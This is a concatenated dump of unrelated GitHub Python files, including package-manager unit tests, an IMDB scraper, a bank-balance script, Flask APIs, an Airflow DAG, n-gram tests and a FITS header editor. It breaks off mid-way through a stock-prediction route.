self.assertTrue(os.path.isdir(os.path.expanduser('~/.cache/hkg')))\n self.assertTrue(os.path.isdir(os.path.expanduser('~/.local/share/hkg')))\n self.assertTrue(os.path.isdir(os.path.expanduser('~/bin')))\n self.assertTrue(os.path.isfile(os.path.expanduser('~/.cache/hkg/hkghello.hkg')))\n self.assertTrue(os.path.isfile(os.path.expanduser('~/bin/hkghello')))\n self.assertFalse(hkg.install_package('hkghello', ''))\n\n # Cleanup\n os.remove(os.path.expanduser('~/.cache/hkg/hkghello.hkg'))\n os.rmdir(os.path.expanduser('~/.cache/hkg'))\n os.remove(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/hkghello.sh'))\n os.remove(os.path.expanduser('~/.local/share/hkg/hkghello/metadata'))\n os.remove(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/etc/settings.conf'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/etc'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/lib'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg/hkghello'))\n os.remove(os.path.expanduser('~/.local/share/hkg/packages.hdb'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg'))\n os.remove(os.path.expanduser('~/bin/hkghello'))\n\n # Could add this functionality so user doesn't have to manually edit .bashrc\n def test_configure_user_home_bin_dir_in_user_path(self):\n \n pass\n\n # Could test if the new executable that was installed has execute bit set properly for user\n def test_can_properly_run_newly_installed_executable_in_shell(self):\n \n pass\n\n\nclass TestRemovePackage(unittest.TestCase):\n\n def test_delete_package(self):\n\n # Setup\n self.assertTrue(hkg.install_package('hkghello', ''))\n\n # Test and Cleanup\n self.assertTrue(hkg.remove_package('hkghello'))\n\n\nclass TestUpdatePackage(unittest.TestCase):\n\n def test_update_package(self):\n\n self.assertTrue(hkg.update_package('all', False))\n pass\n\n def test_can_download_repo_package_databases(self):\n \n pass\n\n def test_can_compare_local_and_remote_package_databases(self):\n \n pass\n\n def test_can_pass_list_of_packages_needing_update_to_install_function(self):\n \n pass\n\n\nclass TestPackageInformation(unittest.TestCase):\n\n def test_list_packages(self):\n\n self.assertTrue(hkg.list_packages('http://sffennel.desktop.amazon.com/files/packages/hkg'))\n self.assertTrue(hkg.list_packages('all'))\n # Odd testing situation here\n # HKG works fine if the local package database is empty\n # However, this test errors out (not just fails, but errors out the interpreter) if there are no installed pkgs\n hkg.install_package('hkghello', '')\n self.assertTrue(hkg.list_packages('local'))\n hkg.remove_package('hkghello')\n self.assertFalse(hkg.list_packages('http://127.0.0.1/no/eggs/for/you'))\n\n def test_show_package_information(self):\n\n # Test against package in cache\n hkg.install_package('hkghello', '')\n self.assertTrue(hkg.package_info('hkghello'))\n hkg.remove_package('hkghello')\n\n # Test against package not in cache\n self.assertTrue(hkg.package_info('hkghello'))\n os.remove(os.path.expanduser('~/.cache/hkg/hkghello.hkg'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Eadrom/python-hkg","sub_path":"hkg_development/tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":16480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30721477152","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 27 11:07:03 2016\n\n@author: 
sonia\n\"\"\"\n\nfrom lxml import html\nimport requests\nimport pandas as pd\nimport time \nimport sys\n\nyears_list = pd.read_csv('Data/imdb_years.csv')\n\n## Extract list for each year and write to a csv file\nfor yr in range(2004, 2015):\n link_to_year_list = years_list.loc[years_list['year'] == yr].link\n #link_to_list_2015 = years_list.loc[years_list['year'] == 2015].link\n page = requests.get(link_to_year_list.values[0]) \n tree = html.fromstring(page.content)\n\n name = tree.xpath('//h3[@class=\"lister-item-header\"]//a//text()') # parse movie name\n movie_link = tree.xpath('//h3[@class=\"lister-item-header\"]//a/@href') # parse the link to movie page\n release_year = tree.xpath('//h3//span[@class=\"lister-item-year text-muted unbold\"]//text()') # parse the year of release\n\n\n\n nextpage_path = tree.xpath('//a[@class=\"lister-page-next next-page\"]/@href')[0] # parse the link to got to the next page\n nextpage = 'http://www.imdb.com/search/title' + nextpage_path\n print('page', 1, 'extracted')\n\n df = pd.DataFrame({'name': name, 'release_year': release_year, 'movie_page_link': movie_link})\n\n start = time.time()\n # repeat the above process for all pages, and extend the lists\n for i in range(48):\n page = requests.get(nextpage)\n tree = html.fromstring(page.content)\n \n next_name = tree.xpath('//h3[@class=\"lister-item-header\"]//a//text()')\n next_movie_link = tree.xpath('//h3[@class=\"lister-item-header\"]//a/@href')\n next_release_year = tree.xpath('//h3//span[@class=\"lister-item-year text-muted unbold\"]//text()')\n next_array = [next_name, next_movie_link, next_release_year]\n \n if (len(next_name)== len(next_release_year)) & (len(next_release_year)==len(next_movie_link)):\n next_df = pd.DataFrame({'name': next_name, 'release_year': next_release_year, 'movie_page_link': next_movie_link})\n df = pd.concat([df, next_df])\n print(i+2, 'data frames merged')\n \n if i < 197:\n nextpage_path = tree.xpath('//a[@class=\"lister-page-next next-page\"]/@href')[0]\n nextpage = 'http://www.imdb.com/search/title' + nextpage_path\n else:\n break\n print('page', i+2, 'extracted')\n print(\"total time taken this loop: \", time.time() - start) \n\n\n # write to a file\n file_name = 'imdb_list_' + str(yr) + '.csv'\n df.to_csv(file_name)\n print(yr, 'done!')\n","repo_name":"soniasharma/MovieRevenuePrediction","sub_path":"IMDB_movies_list.py","file_name":"IMDB_movies_list.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32807706690","text":"import DatabaseConnection\r\nimport locale\r\n\r\n\r\n# We create bank account by adding new records into the Customers table\r\n\r\ntrigger = DatabaseConnection.sql.connect(host=DatabaseConnection.host, user=DatabaseConnection.user,\r\n password=DatabaseConnection.password, database=\"Customers\")\r\ntrigger_handle = trigger.cursor()\r\n\r\nlocale.setlocale(locale.LC_MONETARY, 'en_NG')\r\n\r\ndef account_bal_retrieval():\r\n cus_input = input(\"Enter account Number: \\n\")\r\n # we select account balance from the user input\r\n try:\r\n acc_balance = \"SELECT Balance FROM Customers WHERE Account_Number = %s\"\r\n bal_value = (str(cus_input),) # convert the input to string\r\n trigger_handle.execute(acc_balance, bal_value)\r\n acc_bal_tpl = trigger_handle.fetchone()\r\n acc_bal = acc_bal_tpl[0]\r\n acc_bal_currency = locale.currency(acc_bal, grouping=True)\r\n except Exception as ex:\r\n print(\"Failed to carry out operation\")\r\n print(ex)\r\n\r\n 
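# NOTE: acc_bal_currency above is only defined when the balance lookup succeeded; the lookup below assumes the try block did not raise.\r\n    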
# we select account name from the user input\r\n acc_name = \"SELECT Name FROM Customers WHERE Account_Number = %s\"\r\n name_value = (str(cus_input),)\r\n trigger_handle.execute(acc_name, name_value)\r\n name_display_tpl = trigger_handle.fetchone()\r\n name_display = name_display_tpl[0]\r\n\r\n print(f\"Dear {name_display},\\n\"\r\n f\"your account balance is:\\n\"\r\n f\" {acc_bal_currency}\")\r\n print(\"===============================================\\n\")\r\n print(\"What would you like to do next? \\n\")\r\n","repo_name":"al-fatih87/bank-simulator","sub_path":"AccountBalance.py","file_name":"AccountBalance.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36725605609","text":"from .utils import return_jsonp, auth_jsonp, auth_logger\nfrom jsmodule import set_context as set_js_context\nfrom urllib.parse import urljoin\n\ndef set_context(request):\n return set_js_context({\n 'json_view_prefix': urljoin(request.path, '$')[:-1]\n })\n\ndef get_log_view(logger):\n @return_jsonp\n @auth_jsonp\n def get_logs(request):\n max_count = 1000\n GET = request.GET\n logs = logger.get_records(GET.get('from'), GET.get('to'), max_count + 1)\n if len(logs) > max_count:\n return {\n 'logs': logs[:max_count],\n 'is_all': False\n }\n return {\n 'logs': logs,\n 'is_all': True\n }\n return get_logs\n\nget_logs = get_log_view(auth_logger)\n","repo_name":"bec5-group/bec5-web","sub_path":"json_view/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7611262238","text":"import unittest\n\nfrom NGram.InterpolatedSmoothing import InterpolatedSmoothing\nfrom test.SimpleSmoothingTest import SimpleSmoothingTest\n\n\nclass InterpolatedSmoothingTest(SimpleSmoothingTest, unittest.TestCase):\n\n def setUp(self) -> None:\n super().setUp()\n interpolatedSmoothing = InterpolatedSmoothing()\n self.complexBiGram.calculateNGramProbabilitiesTrained(self.validationCorpus, interpolatedSmoothing)\n self.complexTriGram.calculateNGramProbabilitiesTrained(self.validationCorpus, interpolatedSmoothing)\n\n def test_PerplexityComplex(self):\n self.assertAlmostEqual(917.214864, self.complexBiGram.getPerplexity(self.testCorpus), 4)\n self.assertAlmostEqual(3000.451177, self.complexTriGram.getPerplexity(self.testCorpus), 4)\n\n def test_CalculateNGramProbabilitiesComplex(self):\n self.assertAlmostEqual(0.000418, self.complexBiGram.getProbability(\"\", \"mustafa\"), 4)\n self.assertAlmostEqual(0.005555, self.complexBiGram.getProbability(\"mustafa\", \"kemal\"), 4)\n self.assertAlmostEqual(0.014406, self.complexTriGram.getProbability(\"\", \"mustafa\", \"kemal\"), 4)\n self.assertAlmostEqual(0.058765, self.complexTriGram.getProbability(\"mustafa\", \"kemal\", \"atatürk\"), 4)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"StarlangSoftware/NGram-Py","sub_path":"test/InterpolatedSmoothingTest.py","file_name":"InterpolatedSmoothingTest.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"36457818864","text":"#to open a file placed in same location as that of python file\r\nf = open(\"datafile.txt\", \"r\")\r\nprint(f.read())\r\nf.close()\r\n#to open a file placed in different directory\r\n'''f = open(\"D:\\\\demofile.txt\", \"r\")\r\nprint(f.read())\r\nf.close()'''\r\n#to read only specific 
part from the text file\r\nf = open(\"datafile.txt\", \"r\")\r\nprint(f.read(5))\r\n#you can return one line by using the readline() method:\r\nprint(f.readline())\r\n#By looping through the lines of the file, you can read the whole file, line by line:\r\nf = open(\"datafile.txt\", \"r\")\r\nfor x in f:\r\n print(x)\r\n\r\n#To write to an existing file\r\nf = open(\"datafile.txt\", \"a\")\r\nf.write(\"Now the file has more content!\")\r\nf.close()\r\n\r\n#open and read the file after the appending:\r\nf = open(\"datafile.txt\", \"r\")\r\nprint(f.read())\r\n#to overite the content we must open file in w mode\r\nf = open(\"demofile3.txt\", \"w\")\r\nf.write(\"Woops! I have deleted the content!\")\r\nf.close()\r\n\r\n#open and read the file after the appending:\r\nf = open(\"demofile3.txt\", \"r\")\r\nprint(f.read())\r\n#\r\nf = open(\"myfile.txt\", \"x\")\r\n#to delete a file\r\nimport os\r\nif os.path.exists(\"demofile.txt\"):\r\n os.remove(\"demofile.txt\")\r\nelse:\r\n print(\"The file does not exist\")\r\n ","repo_name":"vaibhavkamble460/21-DAYS-PROGRAMMING-CHALLENGE","sub_path":"filehandling.py","file_name":"filehandling.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14240624669","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of LDTObserverTools.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Created on 17-Oct-2022\n#\n# @author: tbowers\n\n\"\"\"FITS File Utility Module\n\nLDTObserverTools contains python ports of various LDT Observer Tools\n\nLowell Discovery Telescope (Lowell Observatory: Flagstaff, AZ)\nhttps://lowell.edu\n\nThis file contains FITS Header utility routines.\n\"\"\"\n\n# Built-In Libraries\nimport pathlib\n\n# 3rd-Party Libraries\nimport ccdproc\n\n# Local Libraries\nfrom obstools import utils\n\n# CONSTANTS\n\n\ndef fix_ldt_header(files: str | pathlib.Path | list, keyword: str, new_value):\n \"\"\"Change FITS header keywords\n\n Sometimes at the telescope, incorrect or incomplete information is placed\n into the FITS header. 
This routine is a simple wraper around CCDPROC\n functions for easily making changes to these keywords.\n\n Parameters\n ----------\n files : :obj:`str` or :obj:`~pathlib.Path` or :obj:`list`\n The file(s) for which to update FITS keywords\n keyword : :obj:`str`\n FITS keyword to update\n new_value : :obj:`~typing.Any`\n New value for the FITS keyword\n \"\"\"\n if isinstance(files, list):\n files = [pathlib.Path(f).resolve() for f in files]\n else:\n files = [pathlib.Path(files).resolve()]\n\n # Build the IFC\n icl = ccdproc.ImageFileCollection(filenames=files)\n\n for hdr in icl.headers(overwrite=True):\n # Attempt to get numerical values as numbers, not strings\n try:\n hdr[keyword] = float(new_value)\n except ValueError:\n hdr[keyword] = new_value\n\n\n# Command Line Script Infrastructure (borrowed from PypeIt) ==================#\nclass FixLdtHeader(utils.ScriptBase):\n \"\"\"Script class for ``fix_ldt_header`` tool\n\n Script structure borrowed from :class:`pypeit.scripts.scriptbase.ScriptBase`.\n \"\"\"\n\n @classmethod\n def get_parser(cls, width=None):\n \"\"\"Construct the command-line argument parser.\n\n Parameters\n ----------\n description : :obj:`str`, optional\n A short description of the purpose of the script.\n width : :obj:`int`, optional\n Restrict the width of the formatted help output to be no longer\n than this number of characters, if possible given the help\n formatter. If None, the width is the same as the terminal\n width.\n formatter : :obj:`~argparse.HelpFormatter`\n Class used to format the help output.\n\n Returns\n -------\n :obj:`~argparse.ArgumentParser`\n Command-line interpreter.\n \"\"\"\n\n parser = super().get_parser(\n description=\"Fix a keyword in LDT FITS headers\", width=width\n )\n parser.add_argument(\n \"file\",\n action=\"store\",\n type=str,\n nargs=\"+\",\n help=\"File(s) on which to operate\",\n )\n parser.add_argument(\n \"keyword\", action=\"store\", type=str, help=\"FITS keyword to change\"\n )\n parser.add_argument(\n \"new_value\",\n action=\"store\",\n type=str,\n help=\"New header keyword value to insert\",\n )\n return parser\n\n @staticmethod\n def main(args):\n \"\"\"Main Driver\n\n Simple function that calls the fixer.\n \"\"\"\n # Giddy up!\n fix_ldt_header(files=args.file, keyword=args.keyword, new_value=args.new_value)\n","repo_name":"LowellObservatory/LDTObserverTools","sub_path":"obstools/fix_ldt_header.py","file_name":"fix_ldt_header.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72608023848","text":"from airflow.models import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom includes.main import get_api_data_into_db, write_aggregated_data, join_csv_data_and_latest\nfrom includes.db_manager import setup_db\n\nargs = {\n \"owner\": \"Eduardo Ferrer\",\n 'start_date': days_ago(0)\n}\n\ndag = DAG(\n dag_id='challenge_dag',\n default_args=args,\n schedule_interval='@hourly'\n)\n\nwith dag:\n setup_postgres_db_task = PythonOperator(\n task_id='setup_postgres_db',\n python_callable=setup_db\n )\n\n retrieve_api_data_task = PythonOperator(\n task_id='retrieve_api_data',\n python_callable=get_api_data_into_db\n )\n\n aggregate_data_task = PythonOperator(\n task_id='aggregate_data',\n python_callable=write_aggregated_data\n )\n\n aggregate_customer_data_task = PythonOperator(\n task_id='aggregate_customer_data',\n python_callable=join_csv_data_and_latest\n )\n\n\n\n 
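# Wire the dependencies: API extraction runs only after the database setup, and both aggregation tasks fan out from the extraction task.\n    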
setup_postgres_db_task.set_downstream(retrieve_api_data_task)\n retrieve_api_data_task.set_downstream(aggregate_data_task)\n retrieve_api_data_task.set_downstream(aggregate_customer_data_task)","repo_name":"eferrer686/interview-challenge","sub_path":"dags/challenge-dag.py","file_name":"challenge-dag.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73950788329","text":"from app import app\nfrom flask import json, jsonify, request, abort\nfrom mysql import DataBase\n\n@app.route('/api/admin/test', methods = ['POST'])\ndef add_test():\n json_data = request.json\n if request.method == 'POST':\n DataBase.add_test(json_data['text'], json_data['uid'], json_data['name'])\n return jsonify([{\"result\": True}])\n\n else:\n return abort(404)\n\n@app.route('/api/admin/stat', methods = ['GET'])\ndef get_all_stats():\n if request.method == 'GET':\n data = DataBase.admin_user_results()\n\n result = jsonify(data)\n result.status_code = 200\n return result\n else:\n return abort(404)\n\n\n@app.route('/api/admin/test/', methods = ['DELETE', 'GET'])\ndef remove_test(id):\n if request.method == 'DELETE':\n DataBase.remove_test(id)\n return jsonify([{\"result\": True}])\n\n elif request.method == 'GET':\n data = DataBase.get_one_test(id)\n result = jsonify(data)\n result.status_code = 200\n\n return result\n else:\n return abort(404)\n\n\n\n@app.route('/api/admin', methods = ['POST'])\ndef login_as_admin():\n return 'login'\n\n@app.route('/api/login', methods = ['POST'])\ndef login_as_user():\n json_data = request.json\n if request.method == 'POST':\n get_id = DataBase.add_user(json_data['first_name'], json_data['last_name'])\n return jsonify(get_id)\n else:\n return abort(404)\n\n@app.route('/api/test', methods = ['GET'])\ndef show_all_tests():\n data = DataBase.all_tests()\n\n result = jsonify(data)\n result.status_code = 200\n return result\n\n@app.route('/api/test/', methods = ['GET'])\ndef show_test(id):\n data = DataBase.get_test(id)\n result = jsonify(data)\n result.status_code = 200\n\n return result\n\n@app.route('/api/stat/', methods = ['POST', 'GET'])\ndef user_stats(id):\n if request.method == \"POST\":\n json_data = request.json\n DataBase.add_stat(id,\n json_data['test_id'],\n json_data['test_time'],\n json_data['err_count'],\n json_data['pos'])\n return jsonify([{\"result\" : True}])\n\n elif request.method == \"GET\":\n data = DataBase.get_result(id)\n\n result = jsonify(data)\n return result\n\n else:\n return abort(404)\n\n@app.route('/api/last/', methods = ['GET'])\ndef user_last_stat(id):\n data = DataBase.get_last_result(id)\n\n result = jsonify(data)\n return result\n","repo_name":"arshevchenko/psyho-test","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30645783348","text":"import pytest\n\nfrom logging import CRITICAL, NOTSET\nfrom unittest.mock import MagicMock, call, patch\n\nfrom utils.close_player import close_player, _ClosePlayerThread\n\n\nclass AsyncMock(MagicMock):\n async def __call__(self, *args, **kwargs):\n return super(AsyncMock, self).__call__(*args, **kwargs)\n\n\ndef test_close_player_function():\n with patch(\"utils.close_player._ClosePlayerThread\") as mock_thread:\n mock_player = MagicMock()\n mock_thread_instance = MagicMock()\n mock_thread.return_value = mock_thread_instance\n\n close_player(mock_player)\n\n 
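# close_player is expected to construct the helper thread with the player, start it, and join it, without calling stop_listening itself.\n        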
mock_thread.assert_called_once_with(mock_player)\n mock_thread_instance.start.assert_called_once()\n mock_thread_instance.join.assert_called_once_with()\n mock_player.stop_listening.assert_not_called()\n\n\ndef test_close_player_thread_init():\n p = MagicMock()\n t = _ClosePlayerThread(p)\n assert t.player is p\n\n\n@pytest.mark.asyncio\nasync def test_close_player_thread_test_stop_player():\n with patch(\"utils.close_player.disable\") as mock_disable:\n p = MagicMock()\n p.stop_listening = AsyncMock()\n t = _ClosePlayerThread(p)\n\n await t.stop_player()\n\n mock_disable.assert_has_calls([call(CRITICAL), call(NOTSET)])\n p.stop_listening.assert_called_once()\n\n\ndef test_close_player_thread_run():\n with patch(\"asyncio.new_event_loop\") as mock_new_loop:\n mock_loop = MagicMock()\n mock_new_loop.return_value = mock_loop\n\n p = MagicMock()\n t = _ClosePlayerThread(p)\n t.stop_player = MagicMock()\n mock_coro = MagicMock()\n t.stop_player.return_value = mock_coro\n\n t.run()\n\n mock_new_loop.assert_called_once()\n mock_loop.run_until_complete.assert_called_once_with(mock_coro)\n","repo_name":"MatteoH2O1999/alphaPoke","sub_path":"tests/unit_tests/utils/test_close_player.py","file_name":"test_close_player.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"22546666682","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\n File name: vip.py\r\n Function Des: ...\r\n ~~~~~~~~~~\r\n \r\n author: Jerry \r\n \r\n\"\"\"\r\nfrom flask.ext.restful import Resource, request, marshal_with\r\n\r\nfrom RESTfulApi.handler.vip import get_all_vips, create_vip, get_vips, rm_vip\r\n\r\nfrom RESTfulApi.utils.parsers import token_parser\r\nfrom RESTfulApi.utils.parsers.vip import vip_post_parser\r\nfrom RESTfulApi.utils.fields import deleted_fields, pt_fields\r\nfrom RESTfulApi.utils.fields.vip import vips_fields\r\n\r\n\r\nclass Vips(Resource):\r\n @marshal_with(vips_fields)\r\n def get(self):\r\n token = token_parser.parse_args().token\r\n args = request.args\r\n if args:\r\n vips = get_vips(args, token=token)\r\n else:\r\n vips = get_all_vips(token=token)\r\n return {'vips': vips}\r\n\r\n @marshal_with(pt_fields)\r\n def post(self):\r\n token = token_parser.parse_args().token\r\n vip_args = vip_post_parser.parse_args()\r\n result = create_vip(vip_args.username, vip_args.nickname, vip_args.phone, token=token)\r\n return result\r\n\r\n\r\nclass Vip(Resource):\r\n @marshal_with(deleted_fields)\r\n def delete(self, vip_id):\r\n token = token_parser.parse_args().token\r\n result = rm_vip(vip_id, token=token)\r\n return result\r\n","repo_name":"skyduy/RESTfulAPI","sub_path":"RESTfulApi/resources/vip.py","file_name":"vip.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"53"} +{"seq_id":"13053134923","text":"import math\nimport random\nimport pygame as pg\n\n# -------------------- Параметры работы программы --------------------\n\nH, W = 800, 1200\nWINDOW_TITLE = 'Reflection'\nFPS = 60\nSPARKLE_COUNT = 50\nBACKGROUND_COLOR = (50, 50, 50)\nSPARKLE_COLOR = (200, 200, 200)\nBOX_BORDER_COLOR = (220, 220, 220)\nBOX_BACKGROUND_COLOR = (120, 120, 120)\nTEXT_COLOR = (20, 20, 20)\n\n# Коэффициент для перевода градусов в радианы\nK_RADIAN = math.pi / 180\n\n# Словарь для хранения всех отрезков\nALL_SEGMENTS = {}\n\n# Словарь для хренения всех фигур\nALL_BOXES = []\n\n# Список для хранения всех 
светлячков\nALL_SPARKLE_ITERATORS = []\n\n\n# -------------------- Функции отрисовки --------------------\n\n\ndef draw_background(sc):\n sc.fill(BACKGROUND_COLOR)\n\n\ndef draw_sparkle(sc, sparkle_iterators):\n for sparkle_iterator in sparkle_iterators:\n x, y = next(sparkle_iterator)\n pg.draw.rect(sc, SPARKLE_COLOR, (int(x - 1), int(y - 1), 3, 3))\n\n\ndef draw_boxes(sc, boxes, font):\n for box in boxes:\n x = min(box.dots, key=lambda val: val[0])[0]\n y = min(box.dots, key=lambda val: val[1])[1]\n center_x, center_y = x + box.width // 2, y + box.height // 2\n pg.draw.rect(sc, BOX_BACKGROUND_COLOR, (x, y, box.width, box.height))\n pg.draw.rect(sc, BOX_BORDER_COLOR, (x, y, box.width, box.height), 1)\n\n text = font.render(str(box.collision_count), 0, TEXT_COLOR)\n sc.blit(text, (center_x - text.get_rect().width // 2, center_y - text.get_rect().height // 2))\n\n\n# -------------------- Вспомогательные функции --------------------\n\ndef create_borders_segment():\n \"\"\"Функция создает отрезки - границы окна\"\"\"\n segments_data = [\n ((0, 0), (0, H)),\n ((0, H), (W, H)),\n ((W, H), (W, 0)),\n ((W, 0), (0, 0))\n ]\n for dot1, dot2 in segments_data:\n ALL_SEGMENTS[Segment(dot1, dot2)] = None\n\n\ndef create_sparkle_iterators():\n \"\"\"Функция создает итераторы всех светлячков\"\"\"\n for _ in range(SPARKLE_COUNT):\n sparkle = Sparkle((W // 2, H // 2))\n ALL_SPARKLE_ITERATORS.append(iter(sparkle))\n\n\ndef create_boxes():\n \"\"\"Функция создает фигуры\"\"\"\n preset = [(100, 100), (300, 100), (300, 300), (100, 300)]\n for y0 in range(0, H, 400):\n for x0 in range(0, W, 400):\n dots = [(x0 + dx, y0 + dy) for dx, dy in preset]\n figure = Box(dots)\n ALL_BOXES.append(figure)\n for segment in figure.segments:\n ALL_SEGMENTS[segment] = figure\n\n\ndef get_distance(dot1, dot2):\n \"\"\"Функция возвращает расстояние между двумя точками\"\"\"\n x1, y1 = dot1\n x2, y2 = dot2\n return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n\ndef get_intersection(segment1, segment2):\n \"\"\"Функция возвращает точку пересечения двух отрезков или None, если отрезки не пересекаются\"\"\"\n a1, b1, c1 = segment1.a, segment1.b, segment1.c\n a2, b2, c2 = segment2.a, segment2.b, segment2.c\n if (a1 * b2) == (a2 * b1):\n return None\n x = - (c1 * b2 - c2 * b1) / (a1 * b2 - a2 * b1)\n y = - (a1 * c2 - a2 * c1) / (a1 * b2 - a2 * b1)\n distance1 = get_distance((x, y), segment1.center)\n distance2 = get_distance((x, y), segment2.center)\n if (distance1 > (segment1.length / 2)) or (distance2 > (segment2.length / 2)):\n return None\n return x, y\n\n\ndef get_scalar_mul(vector1, vector2):\n \"\"\"Функция возвращает скалярное произведение векторов\"\"\"\n return vector1[0] * vector2[0] + vector1[1] * vector2[1]\n\n\ndef get_vector_sum(vector1, vector2):\n \"\"\"Функция возвращает сумму двух векторов\"\"\"\n return vector1[0] + vector2[0], vector1[1] + vector2[1]\n\n\ndef get_vector_value_mul(vector, value):\n \"\"\"Функция возвращает произведение вектора на число\"\"\"\n return vector[0] * value, vector[1] * value\n\n\ndef get_reflect_vector(vector, segment):\n \"\"\"Функция возвращает отраженный вектор\"\"\"\n normal = segment.a, segment.b\n result = get_vector_sum(\n vector,\n get_vector_value_mul(normal, -2 * get_scalar_mul(vector, normal) / get_scalar_mul(normal, normal))\n )\n return result\n\n\n# -------------------- Основные классы --------------------\n\n\nclass Sparkle:\n STEP = 5\n\n def __init__(self, dot):\n self.dot = dot\n angle = K_RADIAN * random.randint(0, 359)\n self.vector = self.STEP * math.cos(angle), 
self.STEP * math.sin(angle)\n self.last_reflect_segment = None\n\n def __iter__(self):\n while True:\n yield self.dot\n next_dot = self.dot[0] + self.vector[0], self.dot[1] + self.vector[1]\n\n segments = []\n step_segment = Segment(self.dot, next_dot)\n for segment in ALL_SEGMENTS.keys():\n if segment is self.last_reflect_segment:\n continue\n intersection_dot = get_intersection(segment, step_segment)\n if intersection_dot:\n segments.append((intersection_dot, segment))\n\n if segments:\n self.dot, self.last_reflect_segment = min(\n segments,\n key=lambda val: get_distance(self.dot, val[0])\n )\n self.vector = get_reflect_vector(self.vector, self.last_reflect_segment)\n box = ALL_SEGMENTS[self.last_reflect_segment]\n if box:\n box.collision_count += 1\n else:\n self.dot = next_dot\n\n\nclass Segment:\n\n def __init__(self, dot1, dot2):\n self.dot1, self.dot2 = dot1, dot2\n x1, y1 = dot1\n x2, y2 = dot2\n self.center = (x1 + x2) / 2, (y1 + y2) / 2\n self.a, self.b, self.c = y2 - y1, x1 - x2, y1 * (x2 - x1) - x1 * (y2 - y1)\n self.length = get_distance(dot1, dot2)\n\n\nclass Box:\n\n def __init__(self, dots):\n self.dots = dots\n self.segments = []\n prev_dot = None\n for dot in dots + [dots[0]]:\n if prev_dot:\n self.segments.append(Segment(prev_dot, dot))\n prev_dot = dot\n self.width = max(dots, key=lambda val: val[0])[0] - min(dots, key=lambda val: val[0])[0]\n self.height = max(dots, key=lambda val: val[1])[1] - min(dots, key=lambda val: val[1])[1]\n self.collision_count = 0\n\n\ndef main():\n pg.init()\n sc = pg.display.set_mode((W, H))\n pg.display.set_caption(WINDOW_TITLE)\n clock = pg.time.Clock()\n font = pg.font.SysFont('Arial', 50)\n\n create_borders_segment()\n create_sparkle_iterators()\n create_boxes()\n\n while True:\n events = pg.event.get()\n for event in events:\n if event.type == pg.QUIT:\n pg.quit()\n exit()\n\n draw_background(sc)\n draw_sparkle(sc, ALL_SPARKLE_ITERATORS)\n draw_boxes(sc, ALL_BOXES, font)\n pg.display.update()\n\n clock.tick(FPS)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SergeyLebidko/Reflection","sub_path":"start.pyw","file_name":"start.pyw","file_ext":"pyw","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39220257766","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport datetime\r\nfrom io import BytesIO\r\nimport base64\r\nfrom flask import render_template, request, make_response\r\nimport yfinance as yf\r\nfrom src import app\r\nfrom src.utilities import MasterProphet\r\nfrom src.utilities import Dataset\r\n\r\n@app.after_request\r\ndef add_header(response):\r\n response.headers[\"X-UA-Compatible\"] = \"IE=Edge,chrome=1\"\r\n response.headers[\"Cache-Control\"] = \"public, max-age=0\"\r\n return response\r\n\r\n@app.route(\"/\")\r\n@app.route(\"/home\")\r\ndef home():\r\n \"\"\" Renders the home page \"\"\"\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/predict\", methods=[\"POST\", \"GET\"])\r\ndef predict():\r\n ticker = request.form[\"ticker\"]\r\n master_prophet = MasterProphet(ticker)\r\n\r\n forecast = master_prophet.forecast()\r\n\r\n # Fetch historical data using yfinance\r\n historical_data = yf.download(ticker, start='2010-01-01', end=pd.Timestamp.now().strftime('%Y-%m-%d'))\r\n\r\n actual_forecast = round(forecast.yhat[0], 2)\r\n lower_bound = round(forecast.yhat_lower[0], 2)\r\n upper_bound = round(forecast.yhat_upper[0], 2)\r\n bound 